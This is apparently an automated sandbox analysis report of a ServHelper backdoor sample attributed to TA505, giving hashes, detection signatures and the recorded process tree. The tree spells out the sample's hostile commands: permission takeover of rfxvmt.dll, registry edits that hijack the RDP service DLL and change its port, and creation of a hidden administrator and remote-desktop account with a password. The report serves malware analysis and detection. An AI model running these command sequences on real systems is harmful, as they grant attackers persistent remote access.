Analysis
-
max time kernel
114s -
max time network
189s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
17-04-2022 14:55
Static task
static1
Behavioral task
behavioral1
Sample
9dea50450a6840d3be1898060406c4082c2ae3e808bf26d72baf5560118182c3.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
9dea50450a6840d3be1898060406c4082c2ae3e808bf26d72baf5560118182c3.exe
Resource
win10v2004-20220414-en
General
-
Target
9dea50450a6840d3be1898060406c4082c2ae3e808bf26d72baf5560118182c3.exe
-
Size
5.0MB
-
MD5
e1a8986ee83e069db5911cf5f97ae45e
-
SHA1
24aea95b64acd33ab88a7495a3dcca6d3111cb67
-
SHA256
9dea50450a6840d3be1898060406c4082c2ae3e808bf26d72baf5560118182c3
-
SHA512
5550bf83089cf36fe174aaa814fc185bd0152d9f813f9a645778f380f97d1b8fb66f0de38c0187fa563edb6cbb7864667dd43a479f4ae59be95c26dfef0507b1
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 2376 icacls.exe 3672 icacls.exe 672 icacls.exe 3632 icacls.exe 536 icacls.exe 1396 icacls.exe 4448 icacls.exe 4544 takeown.exe -
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000b000000023159-184.dat upx behavioral2/files/0x000b00000002315f-185.dat upx -
Loads dropped DLL 2 IoCs
pid Process 3080 Process not Found 3080 Process not Found -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 4448 icacls.exe 4544 takeown.exe 2376 icacls.exe 3672 icacls.exe 672 icacls.exe 3632 icacls.exe 536 icacls.exe 1396 icacls.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\shellbrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4796 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1920 powershell.exe 1920 powershell.exe 2244 powershell.exe 2244 powershell.exe 4772 powershell.exe 4772 powershell.exe 1500 powershell.exe 1500 powershell.exe 1920 powershell.exe 1920 powershell.exe 1920 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 648 Process not Found 648 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1920 powershell.exe Token: SeDebugPrivilege 2244 powershell.exe Token: SeDebugPrivilege 4772 powershell.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeRestorePrivilege 3672 icacls.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3756 wrote to memory of 1920 3756 9dea50450a6840d3be1898060406c4082c2ae3e808bf26d72baf5560118182c3.exe 79 PID 3756 wrote to memory of 1920 3756 9dea50450a6840d3be1898060406c4082c2ae3e808bf26d72baf5560118182c3.exe 79 PID 1920 wrote to memory of 3340 1920 powershell.exe 80 PID 1920 wrote to memory of 3340 1920 powershell.exe 80 PID 3340 wrote to memory of 3768 3340 csc.exe 81 PID 3340 wrote to memory of 3768 3340 csc.exe 81 PID 1920 wrote to memory of 2244 1920 powershell.exe 82 PID 1920 wrote to memory of 2244 1920 powershell.exe 82 PID 1920 wrote to memory of 4772 1920 powershell.exe 84 PID 1920 wrote to memory of 4772 1920 powershell.exe 84 PID 1920 wrote to memory of 1500 1920 powershell.exe 86 PID 1920 wrote to memory of 1500 1920 powershell.exe 86 PID 1920 wrote to memory of 4544 1920 powershell.exe 91 PID 1920 wrote to memory of 4544 1920 powershell.exe 91 PID 1920 wrote to memory of 2376 1920 powershell.exe 92 PID 1920 wrote to memory of 2376 1920 powershell.exe 92 PID 1920 wrote to memory of 3672 1920 powershell.exe 93 PID 1920 wrote to memory of 3672 1920 powershell.exe 93 PID 1920 wrote to memory of 672 1920 powershell.exe 94 PID 1920 wrote to memory of 672 1920 powershell.exe 94 PID 1920 wrote to memory of 3632 1920 powershell.exe 95 PID 1920 wrote to memory of 3632 1920 powershell.exe 95 PID 1920 wrote to memory of 536 1920 powershell.exe 96 PID 1920 wrote to memory of 536 1920 powershell.exe 96 PID 1920 wrote to memory of 1396 1920 powershell.exe 97 PID 1920 wrote to memory of 1396 1920 powershell.exe 97 PID 1920 wrote to memory of 4448 1920 powershell.exe 98 PID 1920 wrote to memory of 4448 1920 powershell.exe 98 PID 1920 wrote to memory of 3052 1920 powershell.exe 99 PID 1920 wrote to memory of 3052 1920 powershell.exe 99 PID 1920 wrote to memory of 4796 1920 powershell.exe 100 PID 1920 wrote to memory of 4796 1920 powershell.exe 100 PID 1920 wrote to memory of 1488 1920 powershell.exe 101 PID 1920 wrote to memory of 1488 1920 powershell.exe 101 PID 1920 wrote to memory of 1536 1920 powershell.exe 102 PID 1920 wrote to memory of 1536 1920 powershell.exe 102 PID 1536 wrote to memory of 4164 1536 net.exe 103 PID 1536 wrote to memory of 4164 1536 net.exe 103 PID 1920 wrote to memory of 3620 1920 powershell.exe 104 PID 1920 wrote to memory of 3620 1920 powershell.exe 104 PID 3620 wrote to memory of 4620 3620 cmd.exe 105 PID 3620 wrote to memory of 4620 3620 cmd.exe 105 PID 4620 wrote to memory of 4144 4620 cmd.exe 106 PID 4620 wrote to memory of 4144 4620 cmd.exe 106 PID 4144 wrote to memory of 4400 4144 net.exe 107 PID 4144 wrote to memory of 4400 4144 net.exe 107 PID 1920 wrote to memory of 948 1920 powershell.exe 108 PID 1920 wrote to memory of 948 1920 powershell.exe 108 PID 948 wrote to memory of 2280 948 cmd.exe 109 PID 948 wrote to memory of 2280 948 cmd.exe 109 PID 2280 wrote to memory of 4104 2280 cmd.exe 110 PID 2280 wrote to memory of 4104 2280 cmd.exe 110 PID 4104 wrote to memory of 2084 4104 net.exe 111 PID 4104 wrote to memory of 2084 4104 net.exe 111 PID 1920 wrote to memory of 3408 1920 powershell.exe 113 PID 1920 wrote to memory of 3408 1920 powershell.exe 113 PID 1920 wrote to memory of 4596 1920 powershell.exe 114 PID 1920 wrote to memory of 4596 1920 powershell.exe 114 PID 4552 wrote to memory of 916 4552 cmd.exe 117 PID 4552 wrote to memory of 916 4552 cmd.exe 117 PID 916 wrote to memory of 3228 916 net.exe 118 PID 916 wrote to memory of 3228 916 net.exe 118 PID 800 wrote to memory of 3776 800 cmd.exe 121 PID 800 wrote to memory of 3776 800 cmd.exe 121
Processes
-
C:\Users\Admin\AppData\Local\Temp\9dea50450a6840d3be1898060406c4082c2ae3e808bf26d72baf5560118182c3.exe"C:\Users\Admin\AppData\Local\Temp\9dea50450a6840d3be1898060406c4082c2ae3e808bf26d72baf5560118182c3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a0w13ehb\a0w13ehb.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEFB4.tmp" "c:\Users\Admin\AppData\Local\Temp\a0w13ehb\CSC63E9497A7DFC46CB8C5581EFEF173BC2.TMP"4⤵PID:3768
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4544
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2376
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3672
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:672
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3632
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:536
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1396
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4448
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3052
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:4796
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1488
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:4164
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:4400
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2084
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:3408
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:4596
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3228
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc zqAl5l3e /add1⤵
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc zqAl5l3e /add2⤵PID:3776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc zqAl5l3e /add3⤵PID:2828
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:2456
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:4700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1612
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD1⤵PID:4744
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD2⤵PID:4844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD3⤵PID:1508
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:4456
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1752
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc zqAl5l3e1⤵PID:3128
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc zqAl5l3e2⤵PID:3920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc zqAl5l3e3⤵PID:4712
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5bbee25b0c186745fc23476bcb1c28316
SHA1c17a94bfb84dd68141044d0c0927e9d0b4205a53
SHA25618c8338c09673583385d23f0799541441a00b2df65cf93f1855b0574658d84fd
SHA512efae7a7b1e0d68ae35c3fb1d93263c033c36fc73d132a0035693ac272a196669e030e77da7c7b5a4f36c13b220ab8a2032c7e93428288f2777b987bbd00d9d18
-
Filesize
3KB
MD5caeac63ee65a59ac9435a57795709fdb
SHA13f84d7992c544a3648ae30cc38ce0c67aa684f24
SHA256b96c72df434308ddf5890fbe25842b336a87b18fcd05d21881f2f82eeb6942b5
SHA512c1ee6dc3ef36f924ee238568fae74d0645c89c23c723079edaadfad89872facd13d29e95408c5b2daaaa8a284d049c1099a43390fa8d0c907eea752e724db341
-
Filesize
3.0MB
MD54cbfa161c9ce114d4b772988ef9f8255
SHA128178e575804a3c97434bca53111cab82546be38
SHA256ef297ff9ad64d966e8c977fd8272523f69e73309ed6886b33a8e6e5801e49610
SHA512d89b9eed47c5396983a7b08999b925d105414f9d7aedbcdfb3a2f081eb7f326838a56221883ce3f68b376172c7339878f3a9b24e601cc002be7887ae91371496
-
Filesize
54KB
MD51421ddee54c79131b2374145ebb753c3
SHA114542c04f9ae76fbc1d815199a36df294a97b2ef
SHA256c541a6864196f87b07d9f34622eb2f8571da74909b80df872636bb0b3268f579
SHA51234d70b20959fe6cca4caa633194cb0e94ac226bce2613bed867ad117707095a67dddf1ea12c63533a44d2bdfbff96f788cf0007b7d90e9b4efc691e925ef93ce
-
Filesize
943KB
MD5ba5050b652ce33ba7bb49c0142d8a47f
SHA1497000e9e6ba50077b3e5a24a8301428b84cfdc7
SHA256312d92923a48b780e6719b684f4c472e2d4d966c06d48170162a24f84f5058b0
SHA512bde68a7bc0c9827fbdc4757b13eca5e79d735fda7f6d0be78a92c7cc819dd2609685abeceacfbf3ef56fc25858e9f476fe6b5961600f5911a97b2116733df1e8
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
Filesize
652B
MD5ac1e3bf6d496de430146a6375f849317
SHA16ef37d2b0340b6e54e3d6091083b9e4bb62bd0f2
SHA2562579bf841d125388787add913fe2172e02a026ff968cac2520713adba3dd9c9e
SHA5128ae69aafb33e9f77f941133758f1cd0182383ae36639c2cf0140dd9483bed3b4ce49a5d625f357a0b0fff84bf3342bd26cf0d5079689a7d7172ac2576e6f204e
-
Filesize
504B
MD58e55cb0ca998472ab6d3e295e0c4dd50
SHA1407d07a29b89fc3afc246c0680d5857e3f51019d
SHA25663e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685
SHA512c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28
-
Filesize
369B
MD59329d49441bbe1d5b316525e3e225e9b
SHA1137e91cc339a406ad1d716068495b4997329c788
SHA256e1212da81b48ce7b4eb13f9214bd552b1637588f85eaff809f16338a8d939231
SHA5128e31dddf7a0da822811075d9b19e7dae615849b53820f2b852532e3c44874f9c57ba6a081f882e3ef2bfc09d404f825da26de8aa58785482a1f8b48057b89d42